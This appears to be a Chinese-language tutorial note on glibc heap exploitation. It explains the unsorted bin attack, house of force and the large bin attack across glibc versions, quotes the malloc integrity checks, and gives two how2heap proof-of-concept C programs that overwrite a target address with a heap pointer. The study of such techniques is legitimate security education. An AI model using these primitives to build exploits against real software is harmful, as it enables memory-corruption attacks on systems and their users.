任意地址写较大数总结

unsorted_bin attack

先写一下可以利用的版本吧，也就是GLIBC2.23-GLIBC2.28,我们可以看一下源代码这一段

/* remove from unsorted list */
if (__glibc_unlikely (bck->fd != victim))
  malloc_printerr ("malloc(): corrupted unsorted chunks 3");
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);

这个攻击其实是用在摘链的时候，如果我们可以控制 unsorted_bin中的bk指针，我们可以写入任意地址（姑且称为target），当我们malloc掉这个unsorted_chunk时，我们的target+0x10地址出就会被修改为 main_arena+offest的地址，其实也就是libc中的地址。效果就是修改任意地址为一个较大的数。

在GLIBC2.29及以后，int_malloc()函数源码中加入了这段

mchunkptr next = chunk_at_offset (victim, size);

       if (__glibc_unlikely (chunksize_nomask (next) < 2 * SIZE_SZ)
           || __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
         malloc_printerr ("malloc(): invalid next size (unsorted)");
       if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
         malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
       if (__glibc_unlikely (bck->fd != victim)
           || __glibc_unlikely (victim->fd != unsorted_chunks (av)))
         malloc_printerr ("malloc(): unsorted double linked list corrupted");
       if (__glibc_unlikely (prev_inuse (next)))
         malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");

​ malloc时增加了以下四项检查：

• 下一个chunk的size是否在合理区间
• 下一个chunk的prevsize是否等于victim的size
• 检查unsortedbin双向链表的完整性
• 下一个chunk的previnuse标志位是否为0

也就是说，在2.29以后unsorted_bin attack基本也退出历史舞台了，很少能用的到了，基本被large_bin attck所替代了，检查双向链表的完整性，即检擦了victim的fd,也检查了bck的fd，所以要想使用这个手法，要提前知道heap地址和libc地址才可以。

此外，house of force 在2.29以后也退出了历史舞台，原因是增加了

if (__glibc_unlikely (size > av->system_mem))//0x21000
        malloc_printerr ("malloc(): corrupted top size");

需要检查top_chunk的size,需要小于等于 system_mems,所以基本失效了。

large_bin attack

large_bin attack主要是在unsorted—bin里的chunk，进入large_bin的时候，出现的问题，一共两种常见的利用方式。

• 在申请largebin的过程中，伪造largebin的bk_nextsize，实现非预期内存申请。

• 在largebin插入的过程中，伪造largebin的bk_nextsize以及bk，实现任意地址写堆地址。

申请时利用：

if ((victim = first (bin)) != bin
          && (unsigned long) chunksize_nomask (victim)
            >= (unsigned long) (nb))
            {
              victim = victim->bk_nextsize;
              while (((unsigned long) (size = chunksize (victim)) <
                      (unsigned long) (nb)))
                victim = victim->bk_nextsize; //寻找堆块
                
......
​
              remainder_size = size - nb;
              unlink (av, victim, bck, fwd); //unlin

只要目标地方符合unlink就可以通过检查了。

插入时利用（任意地址写入堆地址）

在我们将chunk1放入large_bin后，我们通过修改chunk1的bk_next_size为target_addr - 0x20，此时 unsorted_bin中有一个large_chunk，我称之为chunk2,但是chunk2的地址size要大于chunk1的size，同时两个size在同一个bin的index范围内。此时我们再malloc任意size的chunk即可将chunk2链入chunk1中去，此时我们target_addr的内容，就会被修改成chunk2的地址。

看以下how2heap

// gcc -g -no-pie largebin.c -o largebin
#include <stdio.h>
#include <stdlib.h>

int main()
{
     unsigned long stack_var1 = 0;
     unsigned long stack_var2 = 0;

     fprintf(stderr, "stack_var1 (%p): %ld\n", &stack_var1, stack_var1);
     fprintf(stderr, "stack_var2 (%p): %ld\n\n", &stack_var2, stack_var2);
 
     unsigned long *p1 = malloc(0x320);
     malloc(0x20);
     unsigned long *p2 = malloc(0x400);
     malloc(0x20);
     unsigned long *p3 = malloc(0x400);
     malloc(0x20);
 
     free(p1);
     free(p2);

     void* p4 = malloc(0x90);
 
     free(p3);
 
     p2[-1] = 0x3f1;
     p2[0] = 0;
     p2[2] = 0;
     p2[1] = (unsigned long)(&stack_var1 - 2);
     p2[3] = (unsigned long)(&stack_var2 - 4);
 
     malloc(0x90);
 
     fprintf(stderr, "stack_var1 (%p): %p\n", &stack_var1, (void *)stack_var1);
     fprintf(stderr, "stack_var2 (%p): %p\n", &stack_var2, (void *)stack_var2);
 
     return 0;
 }

libc2.31后的large_bin attack

2.30以后新增了两个检查

if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
    malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");

if (bck->fd != fwd)
malloc_printerr ("malloc(): largebin double linked list corrupted (bk)");

这两个检查直接导致了，之前的large_bin attack死掉了。

然后再看看新的largebin_attack,实现利用的代码如下

if ((unsigned long) (size) < (unsigned long) chunksize_nomask (bck->bk)){
    fwd = bck;
    bck = bck->bk;
    victim->fd_nextsize = fwd->fd;
    victim->bk_nextsize = fwd->fd->bk_nextsize;
    fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
}

chunk1进入largebin后，此时有一个chunk2（size大于chunk1）,我们修改chunk1的bk_next_size为targe-0x20,此时再通过malloc将chunk2挂载进largebin，此时target被修改成chunk2的地址。

how to heap

#include<stdio.h>
#include<stdlib.h>
#include<assert.h>

/*

A revisit to large bin attack for after glibc2.30

Relevant code snippet :

    if ((unsigned long) (size) < (unsigned long) chunksize_nomask (bck->bk)){
        fwd = bck;
        bck = bck->bk;
        victim->fd_nextsize = fwd->fd;
        victim->bk_nextsize = fwd->fd->bk_nextsize;
        fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
    }


*/

int main(){
  /*Disable IO buffering to prevent stream from interfering with heap*/
  setvbuf(stdin,NULL,_IONBF,0);
  setvbuf(stdout,NULL,_IONBF,0);
  setvbuf(stderr,NULL,_IONBF,0);

  printf("\n\n");
  printf("Since glibc2.30, two new checks have been enforced on large bin chunk insertion\n\n");
  printf("Check 1 : \n");
  printf(">    if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))\n");
  printf(">        malloc_printerr (\"malloc(): largebin double linked list corrupted (nextsize)\");\n");
  printf("Check 2 : \n");
  printf(">    if (bck->fd != fwd)\n");
  printf(">        malloc_printerr (\"malloc(): largebin double linked list corrupted (bk)\");\n\n");
  printf("This prevents the traditional large bin attack\n");
  printf("However, there is still one possible path to trigger large bin attack. The PoC is shown below : \n\n");

  printf("====================================================================\n\n");

  size_t target = 0;
  printf("Here is the target we want to overwrite (%p) : %lu\n\n",&target,target);
  size_t *p1 = malloc(0x428);
  printf("First, we allocate a large chunk [p1] (%p)\n",p1-2);
  size_t *g1 = malloc(0x18);
  printf("And another chunk to prevent consolidate\n");

  printf("\n");

  size_t *p2 = malloc(0x418);
  printf("We also allocate a second large chunk [p2]  (%p).\n",p2-2);
  printf("This chunk should be smaller than [p1] and belong to the same large bin.\n");
  size_t *g2 = malloc(0x18);
  printf("Once again, allocate a guard chunk to prevent consolidate\n");

  printf("\n");

  free(p1);
  printf("Free the larger of the two --> [p1] (%p)\n",p1-2);
  size_t *g3 = malloc(0x438);
  printf("Allocate a chunk larger than [p1] to insert [p1] into large bin\n");

  printf("\n");

  free(p2);
  printf("Free the smaller of the two --> [p2] (%p)\n",p2-2);
  printf("At this point, we have one chunk in large bin [p1] (%p),\n",p1-2);
  printf("               and one chunk in unsorted bin [p2] (%p)\n",p2-2);

  printf("\n");

  p1[3] = (size_t)((&target)-4);
  printf("Now modify the p1->bk_nextsize to [target-0x20] (%p)\n",(&target)-4);

  printf("\n");

  size_t *g4 = malloc(0x438);
  printf("Finally, allocate another chunk larger than [p2] (%p) to place [p2] (%p) into large bin\n", p2-2, p2-2);
  printf("Since glibc does not check chunk->bk_nextsize if the new inserted chunk is smaller than smallest,\n");
  printf("  the modified p1->bk_nextsize does not trigger any error\n");
  printf("Upon inserting [p2] (%p) into largebin, [p1](%p)->bk_nextsize->fd->nexsize is overwritten to address of [p2] (%p)\n", p2-2, p1-2, p2-2);

  printf("\n");

  printf("In out case here, target is now overwritten to address of [p2] (%p), [target] (%p)\n", p2-2, (void *)target);
  printf("Target (%p) : %p\n",&target,(size_t*)target);

  printf("\n");
  printf("====================================================================\n\n");

  assert((size_t)(p2-2) == target);

  return 0;
}